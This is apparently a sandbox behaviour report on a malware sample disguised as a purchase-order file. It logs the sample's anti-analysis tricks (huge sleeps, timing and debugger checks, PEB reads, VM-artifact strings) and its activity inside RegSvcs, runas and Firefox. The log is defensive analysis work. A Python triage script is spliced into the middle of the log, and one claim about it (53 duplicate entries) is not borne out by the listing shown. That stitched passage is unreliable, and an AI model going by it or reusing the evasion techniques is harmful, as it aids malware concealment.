                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe  Memory allocated: 1330000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe  Memory allocated: 2E90000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe  Memory allocated: 2CD0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe  Memory allocated: 8FD0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe  Memory allocated: 9FD0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe  Memory allocated: A1D0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe  Memory allocated: B1D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe  Memory allocated: 2510000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe  Memory allocated: 2700000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe  Memory allocated: 2510000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe  Memory allocated: 83B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe  Memory allocated: 93B0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe  Memory allocated: 95A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe  Memory allocated: A5A0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe  Code function: 0_2_0133D1D4 rdtsc
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe  Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477  (4 identical entries)
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe  Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 2326
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 3897
                      Source: C:\Windows\SysWOW64\runas.exe  Window / User API: threadDelayed 374
                      Source: C:\Windows\SysWOW64\runas.exe  Window / User API: threadDelayed 9599
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  API coverage: 0.7 %
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  API coverage: 0.2 %
                      Source: C:\Windows\SysWOW64\runas.exe  API coverage: 2.6 %
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe TID: 7504  Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028  Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7984  Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7968  Thread sleep count: 3897 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8032  Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8016  Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe TID: 8156  Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\runas.exe TID: 7460  Thread sleep count: 374 > 30
                      Source: C:\Windows\SysWOW64\runas.exe TID: 7460  Thread sleep time: -748000s >= -30000s
                      Source: C:\Windows\SysWOW64\runas.exe TID: 7460  Thread sleep count: 9599 > 30
                      Source: C:\Windows\SysWOW64\runas.exe TID: 7460  Thread sleep time: -19198000s >= -30000s
                      Source: C:\Windows\System32\conhost.exe  Last function: Thread delayed  (2 identical entries)
                      Source: C:\Windows\SysWOW64\runas.exe  Last function: Thread delayed  (2 identical entries)
                      Source: C:\Windows\SysWOW64\runas.exe  Code function: 18_2_0050C8A0 FindFirstFileW,FindNextFileW,FindClose
                      Source: runas.exe, 00000012.00000002.2941572830.0000000000567000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                      Source: STiokuWkiGFJ.exe, 00000009.00000002.1936268136.000000000087D000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
                      Source: nhClcdOjQwJ.exe, 00000013.00000002.2942434543.0000000000E9F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2366611269.0000024F2137E000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe  Process information queried: ProcessInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Process queried: DebugPort  (2 identical entries)
                      Source: C:\Windows\SysWOW64\runas.exe  Process queried: DebugPort
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe  Code function: 0_2_0133D1D4 rdtsc
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_00417D53 LdrLoadDll
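Triaging a listing like this one is easier once the fused `Source:` lines are split into process and observation and the evasion evidence is tallied per process. The Python script below is an added example and is not part of the Joe Sandbox report or of Joe Sandbox's tooling: the sample lines are constructed copies in the report's own format (the `sample.exe` path is a placeholder), the technique labels (`SetErrorMode`, `PEB access`, and so on) are this example's own names rather than Joe Sandbox signature names, and the sleep check simply re-applies the `>= -30000s` threshold exactly as the report prints it.

```python
import re
from collections import Counter, defaultdict

# Constructed sample in the format of the Joe Sandbox behaviour listing: the
# source (a process path, or "<process>, <memory-dump id>.sdmp") is fused to
# the observation with no separator. "sample.exe" is a placeholder path.
SAMPLE_REPORT = r"""
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\runas.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_0133D1D4 rdtsc 0_2_0133D1D4
Source: C:\Users\user\Desktop\sample.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\runas.exe TID: 7460Thread sleep time: -748000s >= -30000s
Source: C:\Windows\SysWOW64\runas.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01664164 mov eax, dword ptr fs:[00000030h]8_2_01664164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E10E mov ecx, dword ptr fs:[00000030h]8_2_0163E10E
Source: STiokuWkiGFJ.exe, 00000009.00000002.1936268136.000000000087D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
Source: runas.exe, 00000012.00000002.2941572830.0000000000567000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
"""

# Memory-dump sources end in ".sdmp" (process name before the comma), so try
# that split first; otherwise split right after the first ".exe".
_SDMP_RE = re.compile(r"^Source:\s*(?P<src>.*?\.sdmp)(?P<obs>.*)$")
_EXE_RE = re.compile(r"^Source:\s*(?P<src>.*?\.exe)(?P<obs>.*)$", re.IGNORECASE)
_SLEEP_RE = re.compile(r"sleep time:\s*(-?\d+)s\s*>=\s*(-?\d+)s")
_DELAY_RE = re.compile(r"delay time:\s*(\d+)")
_VM_MARKERS = ("vmware", "vmwar", "hyper-v", "vbox", "virtualbox", "qemu")
# Int64.MaxValue ticks expressed in milliseconds (TimeSpan.MaxValue).
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000   # 922337203685477


def parse_line(line):
    """Split one listing line into (source, observation); None for non-Source lines."""
    line = line.strip()
    for rx in (_SDMP_RE, _EXE_RE):
        m = rx.match(line)
        if m:
            return m.group("src"), m.group("obs").strip()
    return None


def process_name(src):
    """'C:\\...\\runas.exe' or 'runas.exe, 00000012...sdmp' -> 'runas.exe'."""
    return src.split(",", 1)[0].replace("/", "\\").rsplit("\\", 1)[-1]


def classify(obs):
    """Map an observation to an evasion-technique label (this example's own names)."""
    low = obs.lower()
    if "errorbox" in low:
        return "SetErrorMode"          # suppresses crash / open-file dialogs
    if "rdtsc" in low:
        return "rdtsc timing"          # execution-timing check
    if "thread delayed" in low or "thread sleep" in low or "threaddelayed" in low:
        return "long sleep"
    if "debugport" in low:
        return "DebugPort query"       # ProcessDebugPort via NtQueryInformationProcess
    if "fs:[00000030h]" in low:
        return "PEB access"            # fs:[30h] is the PEB (BeingDebugged, NtGlobalFlag)
    if "special instruction interceptor" in low:
        return "special instruction"   # intercepted syscall / special instruction
    if "write watch" in low:
        return "write-watch allocation"
    if "binary or memory string" in low and any(m in low for m in _VM_MARKERS):
        return "VM artifact string"
    return None


def sleep_exceeds_threshold(obs):
    """Re-apply the report's own rule for a 'Thread sleep time: -Xs >= -Ys' entry."""
    m = _SLEEP_RE.search(obs)
    if not m:
        return None
    return abs(int(m.group(1))) >= abs(int(m.group(2)))


def delay_is_timespan_max(obs):
    """True when a 'delay time' is TimeSpan.MaxValue, i.e. an effectively infinite sleep."""
    m = _DELAY_RE.search(obs)
    return None if not m else int(m.group(1)) >= TIMESPAN_MAX_MS


def collapse_duplicates(report_text):
    """Unique lines in first-seen order with counts; the listing repeats identical events."""
    counts, order = Counter(), []
    for line in report_text.splitlines():
        line = line.strip()
        if line and line not in counts:
            order.append(line)
        if line:
            counts[line] += 1
    return [(line, counts[line]) for line in order]


def summarize(report_text):
    """Per-process tally of technique labels: {process: {technique: count}}."""
    per_process = defaultdict(Counter)
    for line in report_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, obs = parsed
        technique = classify(obs)
        if technique:
            per_process[process_name(src)][technique] += 1
    return {proc: dict(c) for proc, c in per_process.items()}


if __name__ == "__main__":
    for proc, techniques in sorted(summarize(SAMPLE_REPORT).items()):
        print(f"{proc}: {techniques}")
```

Run as a script it prints one tally per process; `collapse_duplicates` is what turns the 53 identical powershell.exe NOOPENFILEERRORBOX entries in this report into a single line with a count. The 922337203685477 delay seen throughout the listing equals Int64.MaxValue ticks in milliseconds (TimeSpan.MaxValue), which is why `delay_is_timespan_max` treats it as an effectively infinite sleep rather than a timed one.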
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_01664164 mov eax, dword ptr fs:[00000030h]  (2 entries)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_01596154 mov eax, dword ptr fs:[00000030h]  (2 entries)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_0158C156 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_01624144 mov eax/ecx, dword ptr fs:[00000030h]  (5 entries)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_01628158 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_0163E10E mov eax/ecx, dword ptr fs:[00000030h]  (10 entries)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_01650115 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_015C0124 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_0163A118 mov eax/ecx, dword ptr fs:[00000030h]  (4 entries)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_016661E5 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_015C01F8 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_016561C3 mov eax, dword ptr fs:[00000030h]  (2 entries)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_0160E1D0 mov eax/ecx, dword ptr fs:[00000030h]  (5 entries)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_0158A197 mov eax, dword ptr fs:[00000030h]  (3 entries)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_015D0185 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_01634180 mov eax, dword ptr fs:[00000030h]  (2 entries)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_0164C188 mov eax, dword ptr fs:[00000030h]  (2 entries)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_0161019F mov eax, dword ptr fs:[00000030h]  (4 entries)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_01592050 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_015BC073 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_01616050 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_015AE016 mov eax, dword ptr fs:[00000030h]  (4 entries)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_01626030 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_01614000 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_01632000 mov eax, dword ptr fs:[00000030h]  (8 entries)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_0158A020 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_0158C020 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_016160E0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_0158C0F0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_015D20F0 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_015980E9 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_0158A0E3 mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_016120DE mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_016280A8 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_0159208A mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 8_2_016560B8 mov eax/ecx, dword ptr fs:[00000030h]  (2 entries)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015880A0 mov eax, dword ptr fs:[00000030h]8_2_015880A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163437C mov eax, dword ptr fs:[00000030h]8_2_0163437C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01612349 mov eax, dword ptr fs:[00000030h]8_2_01612349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0166634F mov eax, dword ptr fs:[00000030h]8_2_0166634F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01638350 mov ecx, dword ptr fs:[00000030h]8_2_01638350
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0165A352 mov eax, dword ptr fs:[00000030h]8_2_0165A352
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161035C mov eax, dword ptr fs:[00000030h]8_2_0161035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161035C mov eax, dword ptr fs:[00000030h]8_2_0161035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161035C mov eax, dword ptr fs:[00000030h]8_2_0161035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161035C mov ecx, dword ptr fs:[00000030h]8_2_0161035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161035C mov eax, dword ptr fs:[00000030h]8_2_0161035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0161035C mov eax, dword ptr fs:[00000030h]8_2_0161035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01668324 mov eax, dword ptr fs:[00000030h]8_2_01668324
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01668324 mov ecx, dword ptr fs:[00000030h]8_2_01668324
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01668324 mov eax, dword ptr fs:[00000030h]8_2_01668324
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01668324 mov eax, dword ptr fs:[00000030h]8_2_01668324
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158C310 mov ecx, dword ptr fs:[00000030h]8_2_0158C310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B0310 mov ecx, dword ptr fs:[00000030h]8_2_015B0310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CA30B mov eax, dword ptr fs:[00000030h]8_2_015CA30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CA30B mov eax, dword ptr fs:[00000030h]8_2_015CA30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015CA30B mov eax, dword ptr fs:[00000030h]8_2_015CA30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A3C0 mov eax, dword ptr fs:[00000030h]8_2_0159A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A3C0 mov eax, dword ptr fs:[00000030h]8_2_0159A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A3C0 mov eax, dword ptr fs:[00000030h]8_2_0159A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A3C0 mov eax, dword ptr fs:[00000030h]8_2_0159A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A3C0 mov eax, dword ptr fs:[00000030h]8_2_0159A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0159A3C0 mov eax, dword ptr fs:[00000030h]8_2_0159A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015983C0 mov eax, dword ptr fs:[00000030h]8_2_015983C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015983C0 mov eax, dword ptr fs:[00000030h]8_2_015983C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015983C0 mov eax, dword ptr fs:[00000030h]8_2_015983C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015983C0 mov eax, dword ptr fs:[00000030h]8_2_015983C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016163C0 mov eax, dword ptr fs:[00000030h]8_2_016163C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015C63FF mov eax, dword ptr fs:[00000030h]8_2_015C63FF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0164C3CD mov eax, dword ptr fs:[00000030h]8_2_0164C3CD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015AE3F0 mov eax, dword ptr fs:[00000030h]8_2_015AE3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015AE3F0 mov eax, dword ptr fs:[00000030h]8_2_015AE3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015AE3F0 mov eax, dword ptr fs:[00000030h]8_2_015AE3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A03E9 mov eax, dword ptr fs:[00000030h]8_2_015A03E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A03E9 mov eax, dword ptr fs:[00000030h]8_2_015A03E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A03E9 mov eax, dword ptr fs:[00000030h]8_2_015A03E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A03E9 mov eax, dword ptr fs:[00000030h]8_2_015A03E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A03E9 mov eax, dword ptr fs:[00000030h]8_2_015A03E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A03E9 mov eax, dword ptr fs:[00000030h]8_2_015A03E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A03E9 mov eax, dword ptr fs:[00000030h]8_2_015A03E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015A03E9 mov eax, dword ptr fs:[00000030h]8_2_015A03E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016343D4 mov eax, dword ptr fs:[00000030h]8_2_016343D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016343D4 mov eax, dword ptr fs:[00000030h]8_2_016343D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E3DB mov eax, dword ptr fs:[00000030h]8_2_0163E3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E3DB mov eax, dword ptr fs:[00000030h]8_2_0163E3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E3DB mov ecx, dword ptr fs:[00000030h]8_2_0163E3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0163E3DB mov eax, dword ptr fs:[00000030h]8_2_0163E3DB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01588397 mov eax, dword ptr fs:[00000030h]8_2_01588397
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01588397 mov eax, dword ptr fs:[00000030h]8_2_01588397
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01588397 mov eax, dword ptr fs:[00000030h]8_2_01588397
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158E388 mov eax, dword ptr fs:[00000030h]8_2_0158E388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158E388 mov eax, dword ptr fs:[00000030h]8_2_0158E388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0158E388 mov eax, dword ptr fs:[00000030h]8_2_0158E388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B438F mov eax, dword ptr fs:[00000030h]8_2_015B438F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015B438F mov eax, dword ptr fs:[00000030h]8_2_015B438F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01596259 mov eax, dword ptr fs:[00000030h]8_2_01596259
